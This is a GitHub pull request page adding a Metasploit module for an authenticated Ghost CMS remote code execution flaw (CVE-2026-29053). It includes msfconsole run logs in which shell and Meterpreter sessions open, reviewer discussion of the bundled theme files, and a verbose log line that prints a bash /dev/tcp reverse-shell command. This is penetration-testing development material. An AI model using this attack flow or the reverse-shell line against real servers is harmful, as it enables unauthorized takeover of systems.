Skip to content

Add Ghost CMS Authenticated RCE Exploit (CVE-2026-29053)#21234

Open
vognik wants to merge 21 commits into
rapid7:masterfrom
vognik:CVE-2026-29053
Open

Add Ghost CMS Authenticated RCE Exploit (CVE-2026-29053)#21234
vognik wants to merge 21 commits into
rapid7:masterfrom
vognik:CVE-2026-29053

Conversation

@vognik

@vognik vognik commented Apr 4, 2026

Copy link
Copy Markdown
Contributor

Vulnerability Details

This module exploits a Remote Code Execution (RCE) vulnerability in Ghost CMS.
Specifically crafted malicious themes can execute arbitrary code on the server running Ghost.

Module Information

Module path: modules/exploits/multi/http/ghostcms_cve_2026_29053.rb
Platform: Linux/Unix/Windows

References

Test Output

Linux

msf6 > use multi/http/ghostcms_cve_2026_29053
[*] No payload configured, defaulting to cmd/unix/reverse_nodejs
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RPORT 2368
RPORT => 2368
msf exploit(multi/http/ghostcms_cve_2026_29053) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/ghostcms_cve_2026_29053) > set USERNAME test@gmail.com
USERNAME => test@gmail.com
msf exploit(multi/http/ghostcms_cve_2026_29053) > set PASSWORD 16pm1ewtya
PASSWORD => 16pm1ewtya
msf exploit(multi/http/ghostcms_cve_2026_29053) > run
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Authenticating via session (user: test@gmail.com)...
[!] Ghost CMS requires a 6-digit verification code from your email.
[*] Enter the 6-digit verification code: 738757
[*] Verifying session with code: 738757...
[+] 2FA verification successful! Session established.
[+] Authentication successful!
[*] Downloading active theme 'source' from server...
[*] Injecting payload into: page-fltyuvdvtgcgi.hbs
[*] Uploading infected theme: wfnlfezetpeeoggx
[*] Triggering payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.18.0.3:48654) at 2026-04-04 19:16:26 -0400
whoami
node
cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
VERSION_CODENAME=bookworm
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Windows

msf > use multi/http/ghostcms_cve_2026_29053
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/ghostcms_cve_2026_29053) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RHOSTS 192.168.19.148
RHOSTS => 192.168.19.148
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RPORT 2368
RPORT => 2368
msf exploit(multi/http/ghostcms_cve_2026_29053) > set USERNAME test@gmail.com
USERNAME => test@gmail.com
msf exploit(multi/http/ghostcms_cve_2026_29053) > set PASSWORD 16pm1ewtya
PASSWORD => 16pm1ewtya
msf exploit(multi/http/ghostcms_cve_2026_29053) > set target 1
target => 1
msf exploit(multi/http/ghostcms_cve_2026_29053) > run
[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending stage (232006 bytes) to 192.168.19.148
[+] The target appears to be vulnerable.
[*] Authenticating via session (user: test@gmail.com)...
[+] Session established via password.
[+] Authentication successful!
[*] Downloading active theme 'esnraytnjot' from server...
[*] Injecting payload into: author-john.hbs
[*] Uploading infected theme: fcffvppatcvqkzf
[*] Triggering payload...
[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.148:53278) at 2026-04-04 13:22:38 -0400

meterpreter > sysinfo
Computer        : DESKTOP-vognik
OS              : Windows 10 21H2.
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-vognik\vognik

@vognik vognik marked this pull request as draft April 4, 2026 18:34
@h00die

h00die commented Apr 4, 2026

Copy link
Copy Markdown
Contributor

Are all of these files required to get the exploit working? There are a LOT of files for the theme, the yarn.lock file itself is 3,500 lines of code.

If they are all required id suggest zipping them all together since you likely do that in the code anyways. Then if you need to adjust anything in the zip, just do it in memory.

However, we'd want a minimalistic theme for exploiting, so really look at what's required and what's not.

@vognik

vognik commented Apr 4, 2026

Copy link
Copy Markdown
Contributor Author

If they are all required id suggest zipping them all together since you likely do that in the code anyways. Then if you need to adjust anything in the zip, just do it in memory.

@h00die Sorry, I didn't notice count of lines earlier before committing. Anyway i wanted to give the end user more flexibility if they want to add new files. It’s more convenient to add them to a folder rather than pack/unpack an archive every time.

@vognik vognik marked this pull request as ready for review April 5, 2026 01:56
@vognik vognik changed the title Add CVE-2026-29053 Add Ghost CMS RCE Exploit (CVE-2026-29053) Apr 8, 2026
@bwatters-r7

Copy link
Copy Markdown
Contributor

It is minor, but I think historically, we place compiled code in data/exploits and the source in external/source to emphasize that the code contained is not Metasploit code, but from an external source. (Please correct me if I am misunderstanding that this is third-party source code.)
Further, the license (or at least a reference to it, since it appears non-traditional) should be placed in the LICENSE file in the root directory cataloging the licenses for third-party components.

Copilot AI left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Adds a new Metasploit exploit module for Ghost CMS (CVE-2026-29053) that achieves RCE via malicious theme upload/injection, along with supporting documentation and a reproducible lab setup.

Changes:

  • Introduces multi/http/ghostcms_cve_2026_29053 exploit module with session/JWT auth flows and theme infection/trigger logic.
  • Adds module documentation plus a local Docker lab environment for testing.
  • Adds a bundled Ghost theme template under data/exploits/ and introduces a jwt runtime dependency.

Reviewed changes

Copilot reviewed 27 out of 27 changed files in this pull request and generated 16 comments.

Show a summary per file
File Description
modules/exploits/multi/http/ghostcms_cve_2026_29053.rb New exploit module implementing auth, theme download/upload, payload injection, and triggering.
metasploit-framework.gemspec Adds jwt as a runtime dependency.
documentation/modules/exploit/multi/http/ghostcms_cve_2026_29053.md New user documentation: setup, auth modes, and example runs.
data/exploits/CVE-2026-29053/theme/default.hbs Base layout for the bundled theme used by the module.
data/exploits/CVE-2026-29053/theme/index.hbs Theme index template used by the bundled theme.
data/exploits/CVE-2026-29053/theme/post.hbs Theme post template for bundled theme completeness/validity.
data/exploits/CVE-2026-29053/theme/page.hbs Theme page template for bundled theme completeness/validity.
data/exploits/CVE-2026-29053/theme/tag.hbs Theme tag template for bundled theme completeness/validity.
data/exploits/CVE-2026-29053/theme/author.hbs Theme author template for bundled theme completeness/validity.
data/exploits/CVE-2026-29053/theme/error.hbs Theme error template for bundled theme completeness/validity.
data/exploits/CVE-2026-29053/theme/partials/card.hbs Theme partial used by templates (post cards).
data/exploits/CVE-2026-29053/theme/partials/icons/avatar.hbs SVG icon partial for bundled theme.
data/exploits/CVE-2026-29053/theme/partials/icons/arrow-left.hbs SVG icon partial for bundled theme.
data/exploits/CVE-2026-29053/theme/partials/icons/arrow-right.hbs SVG icon partial for bundled theme.
data/exploits/CVE-2026-29053/theme/partials/icons/facebook.hbs SVG icon partial for bundled theme.
data/exploits/CVE-2026-29053/theme/partials/icons/twitter.hbs SVG icon partial for bundled theme.
data/exploits/CVE-2026-29053/theme/partials/icons/rss.hbs SVG icon partial for bundled theme.
data/exploits/CVE-2026-29053/theme/partials/icons/loader.hbs SVG loader partial for bundled theme.
data/exploits/CVE-2026-29053/theme/members/account.hbs Members template included in bundled theme.
data/exploits/CVE-2026-29053/theme/members/signin.hbs Members template included in bundled theme.
data/exploits/CVE-2026-29053/theme/members/signup.hbs Members template included in bundled theme.
data/exploits/CVE-2026-29053/theme/assets/built/index.js Bundled theme JS asset used when uploading the local theme.
data/exploits/CVE-2026-29053/theme/assets/built/index.css Bundled theme CSS asset used when uploading the local theme.
data/exploits/CVE-2026-29053/theme/README.md Upstream theme README included with bundled theme.
data/exploits/CVE-2026-29053/theme/LICENSE Upstream theme license included with bundled theme.
data/exploits/CVE-2026-29053/lab/docker-compose.yml Docker lab environment for local testing (Ghost + DB).
data/exploits/CVE-2026-29053/lab/config.production.json Lab Ghost configuration (incl. mail/security/spam settings).

Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread data/exploits/CVE-2026-29053/theme/members/signup.hbs
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread metasploit-framework.gemspec Outdated
spec.add_runtime_dependency 'net-sftp'
spec.add_runtime_dependency 'winrm'
spec.add_runtime_dependency 'ffi', '< 1.17.0'
spec.add_runtime_dependency 'jwt' # Needed by modules/exploits/multi/http/ghostcms_cve_2026_29053 module
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread data/exploits/CVE-2026-29053/theme/assets/built/index.js
@smcintyre-r7

Copy link
Copy Markdown
Contributor

Sorry, I didn't notice count of lines earlier before committing. Anyway i wanted to give the end user more flexibility if they want to add new files. It’s more convenient to add them to a folder rather than pack/unpack an archive every time.

That's one perspective. Another is now every user that downloads Metasploit is storing all of these additional files. We need the files that are not necessary striped away. I'd suggest you document how to build the template for users. You could even include a script to setup a basic template but we need the files stripped down to the bare minimum for exploitation.

@vognik

vognik commented Apr 17, 2026

Copy link
Copy Markdown
Contributor Author

Sorry, I didn't notice count of lines earlier before committing. Anyway i wanted to give the end user more flexibility if they want to add new files. It’s more convenient to add them to a folder rather than pack/unpack an archive every time.

That's one perspective. Another is now every user that downloads Metasploit is storing all of these additional files. We need the files that are not necessary striped away. I'd suggest you document how to build the template for users. You could even include a script to setup a basic template but we need the files stripped down to the bare minimum for exploitation.

I absolutely agree with you and I've done it immediately in 6a7fe55 after that message. Now it's about 1550 lines (with documentation and the exploit) instead of 14.5k in the beginning.

I think now there is nothing redundant to delete in the theme, because otherwise a site will be broken. Although the exploit will work with only one file, other pages won't be loaded appropriately. It's important because in the flow with API token we can't revert our uploaded theme to default.

vognik and others added 4 commits April 17, 2026 06:34
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
@msutovsky-r7

Copy link
Copy Markdown
Contributor
msf exploit(multi/http/ghostcms_cve_2026_29053) > run verbose=true 
[+] bash -c '0<&28-;exec 28<>/dev/tcp/172.17.0.1/4444;sh <&28 >&28 2>&28'
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 6.16, which is vulnerable
[*] Authenticating via session (user: msfuser@metasploit.com)...
[+] Session established via password.
[+] Authentication successful!
[*] Downloading active theme "source" from server...
[*] Injecting payload into: page-mrsicafifvjtdnz.hbs
[*] Uploading infected theme: smvivnvmcal
[*] Triggering payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.19.0.3:48250) at 2026-06-02 07:11:31 +0200
[*] Reverting to default theme...
[+] Successfully reverted to theme: source
[*] Removing malicious theme...
[+] Successfully removed malicious theme: smvivnvmcal
[*] Removing content...
[+] Successfully removed content: page 6a1e65e41a8ec20001107cb2

id
uid=1000(node) gid=1000(node) groups=1000(node)

@vognik vognik changed the title Add Ghost CMS RCE Exploit (CVE-2026-29053) Add Ghost CMS Authenticated RCE Exploit (CVE-2026-29053) Jun 21, 2026
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Comment thread modules/exploits/multi/http/ghostcms_cve_2026_29053.rb Outdated
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

Status: Todo

Development

Successfully merging this pull request may close these issues.

6 participants